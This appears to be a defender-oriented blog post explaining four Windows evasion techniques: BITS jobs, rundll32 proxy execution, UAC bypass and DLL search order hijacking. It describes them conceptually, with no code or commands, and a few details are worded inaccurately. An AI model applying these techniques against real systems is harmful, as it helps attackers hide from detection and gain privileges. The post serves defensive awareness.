In today’s cybersecurity space, adversaries are constantly attempting to evade detection so much that they go to great lengths to blend in and keep their attacks concealed. Usually, when hunters uncover their recent malicious activities, adversaries change tactics and find a new technique to lurk in the shadows. One popular way they avoid being detected is by putting into play defense evasion tactics.
Every professional in the digital space must understand the objectives of adversaries’ attacks to properly align defenses with the rapidly changing attack tactics. This blog offers in-depth insight into how defense evasion tactics are emerging and evolving as a threat and also provides crucial areas to focus security efforts.
Popular Defensive Evasion Tactics
Evasion techniques are intentionally designed to avoid technological protections; they use native capabilities to blend in with expected activity. These adversaries exploit and manipulate trusted processes to conceal and disguise their malware. Here are some of the most popular defense evasion tactics that has been experienced within the technology security space in recent years.
1. Background Intelligent Transfer Service (BITS) Jobs
BITS is a service accessible on the Windows operating system and the default method through which Microsoft distributes Windows updates to customers worldwide. BITS is used by applications and system components, such as Windows Update, to send operating system and application updates so that they can be downloaded with minimal disruption.
Adversaries can download and execute files using BITS tasks, which are used to schedule these file transfers. Because they are widespread in many locations and widely utilized in a legitimate administrative context, BITS jobs are interesting to adversaries attempting to secretly upload or download files.
BITS was developed to function in unison with Windows applications, downloading and uploading data invisibly. As a result, this resource can be used to circumvent firewalls that may block harmful or unknown processes — and, of course, it can be used to disguise which apps are requesting or downloading data from the internet.
2. Signed Binary Proxy Execution: Rundll32
Signed binary proxy execution uses legal built-in facilities to execute malicious commands. Adversaries utilize reputable and widely used tools that are signed with digital certificates to proxy the execution of malicious programs.
Adversaries can use rundll32.exe to facilitate the execution of malicious code. Using rundll32.exe instead of running directly (i.e. Shared Modules) may prevent security tools from monitoring rundll32.exe execution due to false positives from routine activities. Rundll32.exe is frequently related to the execution of DLL payloads. Rundll32.exe can also run Control Panel Item files (.cpl) through the use of the unauthorized shell32.dll methods. Control RunDLLAsUser and Control RunDLL. Rundll32.exe is also launched when you double-click a.cpl file.
The malicious DLL generates a rundll32.exe child process that interacts with explorer.exe. WIZARD SPIDER conducted host reconnaissance via the trustworthy explorer.exe process. OverWatch alerted the victim organization early on about the intrusion and provided them with the information they needed to stop the attacker before they could penetrate deeper into the network or execute any ransomware payloads.
3. Abuse Elevation Control Mechanism
Adversaries can exploit procedures designed to control privilege elevation to get higher-level permissions. Most current systems include native elevation control methods designed to limit the rights that a user can exercise on a machine. Authorization must be provided to certain users for them to execute potentially dangerous tasks. An attacker can use a variety of techniques to exploit built-in control mechanisms to escalate privileges on a system.
Adversaries can circumvent UAC mechanisms to get system-wide process privileges. Windows User Account Control (UAC) enables a program to raise its rights (recorded as integrity levels ranging from low to high) to accomplish a job with administrator-level permissions, maybe by prompting the user for an agreement.
The impact on the user ranges from refusing the operation under strict enforcement to allowing the user to conduct the activity if they are a member of the local administrators’ group and click through the prompt or requiring an administrator password to complete the action.
4. Hijack Execution Flow: DLL Search Order Hijacking
By hijacking the search order used to load DLLs, adversaries can execute their own malicious payloads. A typical method is used by Windows systems to look for required DLLs to load into an application. Hijacking DLL loading could be used to establish persistence, elevate privileges, and/or circumvent file execution constraints.
An adversary can hijack DLL loading in a variety of methods. Adversaries may place trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library requested by a program, enabling Windows to load their malicious library when the victim program calls for it. Adversaries may also use DLL preloading, also known as binary planting, to place a malicious DLL with the same name as an ambiguously stated DLL in a location where Windows searches before the valid DLL.
Adversaries can also directly affect the search order by enabling DLL redirection, which causes a program to load a different DLL after being enabled (through the Registry and the development of a redirection file). If a search order-vulnerable program is set to run at a higher privilege level, the adversary-controlled DLL that is loaded will be executed at the same level. Depending on the program, the technique could be used for privilege escalation from user to administrator or SYSTEM, or from administrator to SYSTEM. Path hijacked programs may appear to run normally because malicious DLLs may be set to load the genuine DLLs they were designed to replace.
Importance of Staying Updated on Defense Evasion Tactics
When it comes to security evasion techniques, the tactics outlined in this article are just the tip of the iceberg. In many circumstances, these techniques make use of genuine software features, making pure signature-based identification difficult.
Experts advise that cyberspace professionals familiarize themselves with standard network settings and activities required for security in their field. Interestingly, there is a never-ending Batman and the Joker interaction between cyberattack and defense, as both sides are always co-evolving. Although this love-hate dynamic in the digital security ecosystem may never cease, every individual must contribute their fair share towards overall cybersecurity.
Related article: How are DDoS Attacks Stopped?